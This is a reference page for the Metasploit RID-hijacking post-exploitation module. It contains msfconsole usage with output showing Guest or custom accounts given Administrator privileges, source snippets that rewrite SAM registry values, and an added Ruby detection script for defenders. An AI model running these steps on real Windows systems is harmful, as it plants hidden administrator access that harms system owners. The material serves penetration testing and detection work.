Windows Manage RID Hijacking - Metasploit
This page contains detailed information about how to use the post/windows/manage/rid_hijack metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Manage RID Hijacking
Module: post/windows/manage/rid_hijack
Source code: modules/post/windows/manage/rid_hijack.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module creates an entry on the target by modifying some properties of an existing account: it changes the account attributes by setting a Relative Identifier (RID) that is owned by another existing account on the target machine. Taking advantage of integrity weaknesses in Windows local user management, the module lets an operator authenticate with the credentials of one known account (such as the GUEST account) and obtain the privileges of another existing account (such as the ADMINISTRATOR account), even if the spoofed account is disabled.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/manage/rid_hijack
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/manage/rid_hijack
msf post(rid_hijack) > show options
... show and set options ...
msf post(rid_hijack) > set SESSION session-id
msf post(rid_hijack) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/manage/rid_hijack")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Overview
This module creates an entry on the target by modifying some properties of an existing account: it changes the account attributes by setting a Relative Identifier (RID) that is owned by another existing account on the target machine.
Taking advantage of integrity weaknesses in Windows local user management, the module lets an operator authenticate with the credentials of one known account (such as the GUEST account) and obtain the privileges of another existing account (such as the ADMINISTRATOR account), even if the spoofed account is disabled.
Using a meterpreter session against a Windows host, the module tries to acquire SYSTEM privileges if needed, then modifies the account attributes so that one local account hijacks the permissions of another.
For more information see csl.com.co.
Vulnerable Software
This module has been tested against:
- Windows XP, 2003. (32 bits)
- Windows 8.1 Pro. (64 bits)
- Windows 10. (64 bits)
- Windows Server 2012. (64 bits)
This module was not tested against, but may work on:
- Other versions of windows (x86 and x64).
Options
- GETSYSTEM: Try to get SYSTEM privileges on the victim. Default: false
- GUEST_ACCOUNT: Use the GUEST built-in account as the destination of the privileges to be hijacked, i.e. set this account as the hijacker. Default: false
- SESSION: The session to run this module on. Default: none
- USERNAME: Set the user account (SAM Account Name) on the victim host that will be the destination of the privileges to be hijacked, i.e. set this account as the hijacker. If the GUEST_ACCOUNT option is set to true, this parameter is ignored even if defined. Default: none
- PASSWORD: Set or change the password of the account defined as the destination of the privileges to be hijacked, either the GUEST account or the user account set in the USERNAME option, i.e. set the password of the hijacker account. Default: none
- RID: Specify the RID number, in decimal, of the victim account. This number should be the RID of an existing account on the target host, whether or not it is disabled (e.g. the RID of the Administrator built-in account is 500). This is the RID owned by the account that will be hijacked. Default: 500
Verification Steps
- Get a meterpreter session on some host.
- Do: use post/windows/manage/rid_hijack
- Do: set SESSION <SESSION_ID>, replacing <SESSION_ID> with the desired session.
- Do: set GETSYSTEM true
- Do: set GUEST_ACCOUNT true
- Do: run
- Log in on the victim host with the GUEST account credentials.
Scenarios
Assigning Administrator privileges to Guest built-in account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set SESSION 1
SESSION => 1
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[*] Account is disabled, activating...
[+] Target account enabled
[*] Overwriting RID
[+] The RID 500 is set to the account Invitado with original RID 501
[*] Post module execution completed
Results after logging in as the Guest account.
Assigning Administrator privileges to local custom account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 500 is set to the account testuser with original RID 1002
[*] Post module execution completed
Results after logging in as the testuser account.
Assigning custom privileges to Guest built-in account and setting new password to Guest.
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set RID 1002
RID => 1002
msf post(rid_hijack) > set PASSWORD Password.1
PASSWORD => Password.1
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account Invitado with original RID 501
[*] Setting Invitado password to Password.1
[*] Post module execution completed
Assigning custom privileges to local custom account and setting new password to custom account.
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > set PASSWORD Password.2
PASSWORD => Password.2
msf post(rid_hijack) > run
[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account testuser with original RID 1002
[*] Setting testuser password to Password.2
[*] Post module execution completed
Msfconsole Usage
Here is how the windows/manage/rid_hijack post exploitation module looks in the msfconsole:
msf6 > use post/windows/manage/rid_hijack
msf6 post(windows/manage/rid_hijack) > show info
Name: Windows Manage RID Hijacking
Module: post/windows/manage/rid_hijack
Platform: Windows
Arch:
Rank: Normal
Provided by:
Sebastian Castro <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
GETSYSTEM      false            yes       Attempt to get SYSTEM privilege on the target host.
GUEST_ACCOUNT  false            yes       Assign the defined RID to the Guest Account.
PASSWORD                        no        Password to set to the defined user account.
RID            500              yes       RID to set to the specified account.
SESSION                         yes       The session to run this module on.
USERNAME                        no        User to set the defined RID.
Description:
This module will create an entry on the target by modifying some
properties of an existing account. It will change the account
attributes by setting a Relative Identifier (RID), which should be
owned by one existing account on the destination machine. Taking
advantage of some Windows Local Users Management integrity issues,
this module will allow to authenticate with one known account
credentials (like GUEST account), and access with the privileges of
another existing account (like ADMINISTRATOR account), even if the
spoofed account is disabled.
References:
http://csl.com.co/rid-hijacking/
Module Options
This is a complete list of options available in the windows/manage/rid_hijack post exploitation module:
msf6 post(windows/manage/rid_hijack) > show options
Module options (post/windows/manage/rid_hijack):
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
GETSYSTEM      false            yes       Attempt to get SYSTEM privilege on the target host.
GUEST_ACCOUNT  false            yes       Assign the defined RID to the Guest Account.
PASSWORD                        no        Password to set to the defined user account.
RID            500              yes       RID to set to the specified account.
SESSION                         yes       The session to run this module on.
USERNAME                        no        User to set the defined RID.
Advanced Options
Here is a complete list of advanced options supported by the windows/manage/rid_hijack post exploitation module:
msf6 post(windows/manage/rid_hijack) > show advanced
Module advanced options (post/windows/manage/rid_hijack):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/manage/rid_hijack module can do:
msf6 post(windows/manage/rid_hijack) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/manage/rid_hijack post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/manage/rid_hijack) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Could not open user's key
- Could not obtain SYSTEM privileges
- Session is not running with SYSTEM privileges. Try setting GETSYSTEM
- Could not access to SAM registry keys
- You must set an username or enable GUEST_ACCOUNT option
- Could not find the specified username
- Can't write to registry... Something's wrong!
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Could not open user's key
Here is a relevant code snippet related to the "Could not open user's key" error message:
      print_good("Found #{name} account!")
      # The RID of a local account is stored as the value *type* of the default
      # value under SAM\...\Names\<name>, which is why it is read from 'Type'.
      skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
      # The nil check has to run before skey['Type'] is read: the shipped module
      # dereferences skey first, so a missing key raises instead of printing the error.
      if !skey
        print_error("Could not open user's key")
        return -1
      end
      rid = skey['Type']
      return rid
    end
    return -1
Could not obtain SYSTEM privileges
Here is a relevant code snippet related to the "Could not obtain SYSTEM privileges" error message:
      if datastore['GETSYSTEM']
        print_status("Trying to get SYSTEM privileges")
        if getsystem
          print_good("Got SYSTEM privileges")
        else
          print_error("Could not obtain SYSTEM privileges")
          return
        end
      else
        print_error("Session is not running with SYSTEM privileges. Try setting GETSYSTEM ")
        return
Session is not running with SYSTEM privileges. Try setting GETSYSTEM
Here is a relevant code snippet related to the "Session is not running with SYSTEM privileges. Try setting GETSYSTEM" error message:
        else
          print_error("Could not obtain SYSTEM privileges")
          return
        end
      else
        print_error("Session is not running with SYSTEM privileges. Try setting GETSYSTEM ")
        return
      end
    else
      print_good("Session is already running with SYSTEM privileges")
    end
Could not access to SAM registry keys
Here is a relevant code snippet related to the "Could not access to SAM registry keys" error message:
    print_status("Target OS: #{wver}")

    # Load the usernames from SAM Registry key
    names_key = registry_enumkeys(reg_key + '\\Names')
    unless names_key
      print_error("Could not access to SAM registry keys")
      return
    end

    # If username is set, looks for it in SAM registry key
    user_rid = -1
You must set an username or enable GUEST_ACCOUNT option
Here is a relevant code snippet related to the "You must set an username or enable GUEST_ACCOUNT option" error message:
      user_rid = 0x1f5
      print_status("Target account: Guest Account")
      username = get_name_from_rid(reg_key, user_rid, names_key)
    else
      if datastore['USERNAME'].to_s.empty?
        print_error("You must set an username or enable GUEST_ACCOUNT option")
        return
      end
      print_status('Checking users...')
      user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)
    end
Could not find the specified username
Here is a relevant code snippet related to the "Could not find the specified username" error message:
      user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)
    end

    # Result of the RID harvesting
    if user_rid == -1
      print_error("Could not find the specified username")
      return
    else
      print_status("Target account username: #{username}")
      print_status("Target account RID: #{user_rid}")
    end
Can't write to registry... Something's wrong!
Here is a relevant code snippet related to the "Can't write to registry... Something's wrong!" error message:
      # Overwrite RID to specified RID
      f = swap_rid(f, datastore['RID'])

      open_key = registry_setvaldata(reg_key + "\\#{r}", "F", f, "REG_BINARY")
      unless open_key
        print_error("Can't write to registry... Something's wrong!")
        return -1
      end
      print_good("The RID #{datastore['RID']} is set to the account #{username} with original RID #{user_rid}")
    end
    # If set, changes the specified username's password
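The snippet above shows the module rewriting the binary F value of the target user's key under the SAM Users registry path, so a hijacked account ends up with an F-embedded RID that no longer matches its own key name. The following Ruby check is an added example, not code from the Metasploit module, that a defender can run over exported F values to flag such mismatches and duplicate RIDs; it assumes the RID is a little-endian DWORD at offset 0x30 of the F value and that bit 0 of the flags word at offset 0x38 marks a disabled account, and the sample F values are constructed.

```ruby
# Added example: RID hijacking detection from SAM "F" values (not part of the
# Metasploit module). Assumed layout: RID as a little-endian DWORD at offset
# 0x30, ACB flags word at 0x38 with bit 0 = account disabled. Subkeys under
# SAM\SAM\Domains\Account\Users are named after the RID in 8-digit hex.
RID_OFFSET   = 0x30
FLAGS_OFFSET = 0x38
ACB_DISABLED = 0x0001

# Parse the RID and the disabled flag out of one F value (a binary string).
def parse_f(f)
  raise ArgumentError, "F value too short" if f.bytesize < FLAGS_OFFSET + 2
  {
    rid:      f[RID_OFFSET, 4].unpack1('V'),
    disabled: (f[FLAGS_OFFSET, 2].unpack1('v') & ACB_DISABLED) != 0
  }
end

# users: { "000001F4" => <F bytes>, ... }, i.e. Users subkeys keyed by hex name.
# Returns an array of finding strings; an empty array means no indicators.
def detect_rid_hijack(users)
  findings = []
  seen = Hash.new { |h, k| h[k] = [] }
  users.each do |key_name, f|
    key_rid = key_name.to_i(16)
    info = parse_f(f)
    # A key whose embedded RID differs from its name has had its F value rewritten.
    if info[:rid] != key_rid
      findings << "key #{key_name} (RID #{key_rid}) carries embedded RID #{info[:rid]}"
    end
    seen[info[:rid]] << key_name
  end
  # Two accounts resolving to the same RID are indistinguishable to the OS.
  seen.each do |rid, keys|
    findings << "RID #{rid} is shared by keys #{keys.join(', ')}" if keys.size > 1
  end
  findings
end

# Constructed sample F values; only the fields this check reads are populated.
def build_f(rid, disabled: false)
  f = ("\x00" * 0x50).b
  f[RID_OFFSET, 4]   = [rid].pack('V')
  f[FLAGS_OFFSET, 2] = [disabled ? ACB_DISABLED : 0].pack('v')
  f
end

SAMPLE_USERS = {
  '000001F4' => build_f(500),   # Administrator, untouched
  '000001F5' => build_f(500),   # Guest (RID 501) with its F value rewritten to RID 500
  '000003EA' => build_f(1002),  # testuser, untouched
}

if __FILE__ == $PROGRAM_NAME
  detect_rid_hijack(SAMPLE_USERS).each { |m| puts "[!] #{m}" }
end
```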
See Also
Check also the following modules related to this module:
- post/windows/manage/add_user
- post/windows/manage/archmigrate
- post/windows/manage/change_password
- post/windows/manage/clone_proxy_settings
- post/windows/manage/delete_user
- post/windows/manage/dell_memory_protect
- post/windows/manage/download_exec
- post/windows/manage/driver_loader
- post/windows/manage/enable_rdp
- post/windows/manage/enable_support_account
- post/windows/manage/exec_powershell
- post/windows/manage/execute_dotnet_assembly
- post/windows/manage/forward_pageant
- post/windows/manage/hashcarve
- post/windows/manage/ie_proxypac
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/install_python
- post/windows/manage/install_ssh
- post/windows/manage/killav
- post/windows/manage/migrate
- post/windows/manage/mssql_local_auth_bypass
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
- post/windows/manage/peinjector
- post/windows/manage/persistence_exe
- post/windows/manage/portproxy
- post/windows/manage/pptp_tunnel
- post/windows/manage/priv_migrate
- post/windows/manage/pxeexploit
- post/windows/manage/reflective_dll_inject
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/windows/manage/rollback_defender_signatures
- post/windows/manage/rpcapd_start
- post/windows/manage/run_as
- post/windows/manage/run_as_psh
- post/windows/manage/sdel
- post/windows/manage/shellcode_inject
- post/windows/manage/sshkey_persistence
- post/windows/manage/sticky_keys
- post/windows/manage/vmdk_mount
- post/windows/manage/vss
- post/windows/manage/vss_create
- post/windows/manage/vss_list
- post/windows/manage/vss_mount
- post/windows/manage/vss_set_storage
- post/windows/manage/vss_storage
- post/windows/manage/wdigest_caching
- post/windows/manage/webcam
Authors
Sebastian Castro <sebastian.castro[at]cslcolombia.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.